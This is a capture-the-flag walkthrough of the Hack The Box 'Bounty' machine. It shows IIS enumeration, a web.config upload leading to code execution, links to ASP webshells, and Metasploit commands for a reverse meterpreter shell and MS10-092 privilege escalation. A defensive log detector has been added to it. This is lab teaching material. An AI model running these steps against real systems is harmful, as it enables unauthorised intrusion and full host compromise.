Hack The Box: Bounty

Difficulty: Easy
Machine Creator: mrb3n
Tools Used:

NMAP
Gobuster
Metasploit

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with a simple NMAP scan to discover open ports and services.

nmap -A 10.10.10.93


From the NMAP scan, we can see an HTTP server on port 80 running Microsoft IIS 7.5.


Browsing the website on this server, we see a single image of a wizard.

GoBuster

Using Gobuster, we can perform a directory scan. Since this host is a Windows IIS server, we add the extensions .aspx and .html.

gobuster -u http://10.10.10.93 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html


The Gobuster results show an aspx file and a directory named uploadedfiles.


The transfer.aspx page appears to give us the ability to upload a file.


When I try to upload a file, I just get an error.

Remote Code Execution (RCE)


A little research suggests that we may be able to upload a web.config file and use it to perform remote code execution. This first test simply adds 1+2.


I was able to upload the new web.config file successfully.


Success: the remote code execution returns the result 3.

Webshell

Since we can upload a web.config file, we should be able to upload a web shell in the config file.

https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp


I’ve replaced the configuration section of the web.config file with the web shell code.


The web shell config file uploaded successfully, and now we have a surface to exploit.
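From the defender's side, the same sequence (a POST to the upload form, then a request for a .config or script file under the upload directory) is visible in the IIS W3C logs. The following is an added example, not part of the original writeup: a small detector over constructed sample log lines, using the /transfer.aspx and /uploadedfiles/ paths named above.

```python
"""Flag the upload-then-execute pattern in IIS W3C extended logs.

SAMPLE_LOG is constructed for this example (not real traffic); its
#Fields header follows the IIS default W3C field order.
"""
from collections import defaultdict

SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2018-06-01 12:00:01 10.10.10.93 GET / - 80 - 10.10.14.2 Mozilla/5.0 - 200 0 0 15
2018-06-01 12:00:05 10.10.10.93 GET /transfer.aspx - 80 - 10.10.14.2 Mozilla/5.0 - 200 0 0 31
2018-06-01 12:00:09 10.10.10.93 POST /transfer.aspx - 80 - 10.10.14.2 Mozilla/5.0 http://10.10.10.93/transfer.aspx 200 0 0 46
2018-06-01 12:00:12 10.10.10.93 GET /uploadedfiles/web.config - 80 - 10.10.14.2 Mozilla/5.0 - 200 0 0 62
2018-06-01 12:01:00 10.10.10.93 GET /uploadedfiles/photo.jpg - 80 - 10.10.14.9 Mozilla/5.0 - 200 0 0 12
"""

UPLOAD_HANDLER = "/transfer.aspx"   # upload form seen in the Gobuster results
UPLOAD_DIR = "/uploadedfiles/"      # directory the uploads land in
# Extensions IIS treats as configuration or hands to a code-executing handler.
EXECUTABLE_EXTS = (".config", ".aspx", ".asp", ".ashx", ".asmx")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the #Fields header names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_suspicious(text):
    """Return one alert string per request for a config/script file under the
    upload directory, noting whether that client POSTed to the form earlier."""
    uploaders = defaultdict(list)   # client ip -> times of POSTs to the form
    alerts = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        client = rec["c-ip"]
        if rec["cs-method"] == "POST" and stem == UPLOAD_HANDLER:
            uploaders[client].append(rec["time"])
        elif stem.startswith(UPLOAD_DIR) and stem.endswith(EXECUTABLE_EXTS):
            prior = "after POST to upload form" if uploaders.get(client) else "no prior upload seen"
            alerts.append(f"{rec['date']} {rec['time']} {client} requested {stem} ({prior})")
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_LOG):
        print("ALERT:", alert)
```

The harmless photo.jpg request from a different client produces no alert; only the web.config fetch from the uploading client does.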

Web Delivery Meterpreter Shell

We need to build our exploit from Metasploit using the web delivery script.

msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) set target 2
msf exploit(multi/script/web_delivery) set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) run

The output of the exploit gives us a PowerShell command that we can use on the RCE page.

Meterpreter Shell


Success: after running the PowerShell command from the web shell page, we now have a Meterpreter shell running as user bounty\merlin.

User.txt


With our shell as merlin, we can read user.txt on merlin's desktop.

Privilege Escalation

Now we need a SYSTEM-level session to read root.txt. We can use the local_exploit_suggester post module in Metasploit.

msf use post/multi/recon/local_exploit_suggester
msf set session 2
msf run


After running the exploit suggester, it appears that this machine may be vulnerable to MS10_092.

Privilege Escalation Exploit


After running the exploit ms10_092_schelevator, we have a new Meterpreter session.


System-level Meterpreter shell.

Root.txt


As system, we can now read the contents of root.txt.